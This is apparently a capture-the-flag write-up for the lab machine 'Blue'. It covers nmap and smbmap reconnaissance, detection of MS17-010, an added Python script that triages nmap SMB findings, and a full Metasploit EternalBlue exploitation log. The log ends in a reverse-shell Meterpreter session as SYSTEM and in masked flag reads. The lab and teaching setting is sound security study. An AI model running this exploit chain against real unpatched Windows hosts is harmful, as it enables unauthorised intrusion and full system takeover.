Blue

Introduction:
Recon
# nmap -sS -sV -sC -T4 -oN nmap.blue.txt 10.10.10.40
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-21 20:24 EST
Nmap scan report for 10.10.10.40
Host is up (0.015s latency).
Not shown: 991 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7m58s, deviation: 2s, median: 7m57s
| smb-os-discovery:
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-12-22T01:33:43+00:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-12-22T01:33:40
|_  start_date: 2020-12-22T01:21:07

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.52 seconds
Notes:
- Blue is a Windows machine running Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
- Ports 139/445 are open, which means SMB is running, and as nmap reports, SMBv1 message signing is disabled (SMBv2 signing is enabled but not required)
- SMB allows guest login
Enumeration
SMBMAP
# smbmap -u guest -d x00 -H 10.10.10.40
[+] IP: 10.10.10.40:445 Name: 10.10.10.40
        Disk            Permissions     Comment
        ----            -----------     -------
        ADMIN$          NO ACCESS       Remote Admin
        C$              NO ACCESS       Default share
        IPC$            NO ACCESS       Remote IPC
        Share           READ ONLY
        Users           READ ONLY

nmap --script smb-vuln* -p 139,445 10.10.10.40
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-21 20:47 EST
Nmap scan report for 10.10.10.40
Host is up (0.016s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 13.73 seconds

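Both scans above deliver their verdicts through nmap's host-script output, and the Notes draw their conclusions from it by eye. As an added example that is not part of the original writeup, the Python script below parses the text nmap writes with -oN, pulls out the smb-security-mode, smb2-security-mode and smb-vuln-* results, and lists the findings a defender would act on: guest session accepted, SMBv1 signing disabled, SMBv2 signing not required, and the MS17-010 state with its CVE. The embedded sample report is constructed to mirror the two scans on this page, and the function names (parse_host_scripts, assess, triage) are my own, not nmap's.

```python
"""Triage nmap -oN output for the SMB weaknesses this box exposes.

Added example, not part of the original writeup: parses the text nmap writes
with -oN, extracts the smb-security-mode, smb2-security-mode and smb-vuln-*
host-script results and turns them into findings a defender would act on.
SAMPLE_NMAP_OUTPUT below is constructed to mirror the scans on this page.
"""
import re

# Constructed sample in nmap's normal (-oN) layout, condensed from the two scans.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 10.10.10.40
Host is up (0.015s latency).
PORT    STATE SERVICE      VERSION
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds

Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|_    Disclosure date: 2017-03-14

Nmap done: 1 IP address (1 host up) scanned in 13.73 seconds
"""

# A script header sits directly after "| " or "|_" with no further indentation;
# nested result lines are indented by at least two more spaces.
SCRIPT_HEADER = re.compile(r"^([A-Za-z0-9_-]+):(.*)$")


def parse_host_scripts(text):
    """Return {script_name: [stripped body lines]} for the 'Host script results' block."""
    scripts = {}
    current = None
    in_block = False
    for line in text.splitlines():
        if line.startswith("Host script results:"):
            in_block = True
            continue
        if not in_block:
            continue
        if not line.startswith("|"):
            break  # the first line without a "|" prefix ends the block
        rest = line[2:]  # drop "|" plus the " " or "_" that follows it
        match = SCRIPT_HEADER.match(rest)
        if match:
            current = match.group(1)
            value = match.group(2).strip()
            scripts[current] = [value] if value else []  # one-line scripts keep their value
        elif current is not None and rest.strip():
            scripts[current].append(rest.strip())
    return scripts


def assess(scripts):
    """Turn parsed host-script output into a list of human-readable findings."""
    findings = []
    smb1 = " ".join(scripts.get("smb-security-mode", []))
    if "account_used: guest" in smb1:
        findings.append("SMBv1 accepted a guest session")
    if "message_signing: disabled" in smb1:
        findings.append("SMBv1 message signing disabled")
    smb2 = " ".join(scripts.get("smb2-security-mode", []))
    if "not required" in smb2:
        findings.append("SMBv2 message signing not required")
    for name, lines in scripts.items():
        if not name.startswith("smb-vuln-"):
            continue
        # Multi-line vuln reports carry a "State:" line; one-line scripts put
        # their result (e.g. "false" or an NT_STATUS code) in lines[0].
        state_line = next((ln for ln in lines if ln.startswith("State:")), None)
        if state_line:
            state = state_line.split(":", 1)[1].strip()
        else:
            state = lines[0] if lines else ""
        if state.startswith(("VULNERABLE", "LIKELY VULNERABLE")):
            cves = sorted(set(re.findall(r"CVE-\d{4}-\d+", " ".join(lines))))
            findings.append(f"{name}: {state} ({', '.join(cves) or 'no CVE listed'})")
    return findings


def triage(text):
    """Host address plus findings for one nmap -oN report."""
    host = re.search(r"^Nmap scan report for (\S+)", text, re.M)
    return {
        "host": host.group(1) if host else None,
        "findings": assess(parse_host_scripts(text)),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_NMAP_OUTPUT)
    print(result["host"])
    for finding in result["findings"]:
        print(" -", finding)
```

Run it against a real file with triage(open("nmap.blue.txt").read()); the state check deliberately ignores "NOT VULNERABLE" and NT_STATUS errors so that only positive results reach the findings list.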
Exploitation
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[-] Handler failed to bind to 10.10.14.15:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[-] 10.10.10.40:445 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:4444).
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 4455
lport => 4455
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 10.10.14.15:4455
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 17 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 22 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 10.10.10.40
[*] Meterpreter session 1 opened (10.10.14.15:4455 -> 10.10.10.40:49158) at 2020-12-21 23:39:49 -0500
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter > ls
Listing: C:\Windows\system32
============================

meterpreter > sysinfo
Computer        : HARIS-PC
OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_GB
Domain          : WORKGROUP
Logged On Users : 0
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Post-exploit/PrivEsc
meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Users\haris\Desktop
===============================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
100666/rw-rw-rw- 282   fil   2017-07-14 09:45:52 -0400  desktop.ini
100666/rw-rw-rw- 32    fil   2017-07-21 02:54:02 -0400  user.txt

meterpreter > cat user.txt
4cXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXa9
meterpreter > cd ../../Administrator
meterpreter > ls
Listing: C:\Users\Administrator
===============================

Mode             Size    Type  Last modified              Name
----             ----    ----  -------------              ----
40777/rwxrwxrwx  0       dir   2017-07-21 02:56:23 -0400  AppData
40777/rwxrwxrwx  0       dir   2017-07-21 02:56:24 -0400  Application Data
40555/r-xr-xr-x  0       dir   2017-07-21 02:56:28 -0400  Contacts
40777/rwxrwxrwx  0       dir   2017-07-21 02:56:24 -0400  Cookies
40555/r-xr-xr-x  0       dir   2017-07-21 02:56:23 -0400  Desktop
40555/r-xr-xr-x  4096    dir   2017-07-21 02:56:23 -0400  Documents
40555/r-xr-xr-x  0       dir   2017-07-21 02:56:23 -0400  Downloads
40555/r-xr-xr-x  0       dir   2017-07-21 02:56:23 -0400  Favorites
40555/r-xr-xr-x  0       dir   2017-07-21 02:56:23 -0400  Links
40777/rwxrwxrwx  0       dir   2017-07-21 02:56:24 -0400  Local Settings
40555/r-xr-xr-x  0       dir   2017-07-21 02:56:23 -0400  Music
40777/rwxrwxrwx  0       dir   2017-07-21 02:56:24 -0400  My Documents
100666/rw-rw-rw- 786432  fil   2017-07-21 02:56:23 -0400  NTUSER.DAT
100666/rw-rw-rw- 65536   fil   2017-07-21 02:56:24 -0400  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
100666/rw-rw-rw- 524288  fil   2017-07-21 02:56:24 -0400  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
100666/rw-rw-rw- 524288  fil   2017-07-21 02:56:24 -0400  NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
40777/rwxrwxrwx  0       dir   2017-07-21 02:56:24 -0400  NetHood
40555/r-xr-xr-x  0       dir   2017-07-21 02:56:23 -0400  Pictures
40777/rwxrwxrwx  0       dir   2017-07-21 02:56:24 -0400  PrintHood
40777/rwxrwxrwx  0       dir   2017-07-21 02:56:24 -0400  Recent
40555/r-xr-xr-x  0       dir   2017-07-21 02:56:23 -0400  Saved Games
40555/r-xr-xr-x  0       dir   2017-07-21 02:56:36 -0400  Searches
40777/rwxrwxrwx  0       dir   2017-07-21 02:56:24 -0400  SendTo
40777/rwxrwxrwx  0       dir   2017-07-21 02:56:24 -0400  Start Menu
40777/rwxrwxrwx  0       dir   2017-07-21 02:56:24 -0400  Templates
40555/r-xr-xr-x  0       dir   2017-07-21 02:56:23 -0400  Videos
100666/rw-rw-rw- 262144  fil   2017-07-21 02:56:24 -0400  ntuser.dat.LOG1
100666/rw-rw-rw- 0       fil   2017-07-21 02:56:24 -0400  ntuser.dat.LOG2
100666/rw-rw-rw- 20      fil   2017-07-21 02:56:24 -0400  ntuser.ini

meterpreter > cd Desktop
meterpreter > ls
Listing: C:\Users\Administrator\Desktop
=======================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
100666/rw-rw-rw- 282   fil   2017-07-21 02:56:36 -0400  desktop.ini
100444/r--r--r-- 32    fil   2017-07-21 02:56:49 -0400  root.txt

meterpreter > cat root.txt
ffXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXe717
meterpreter >

Notes: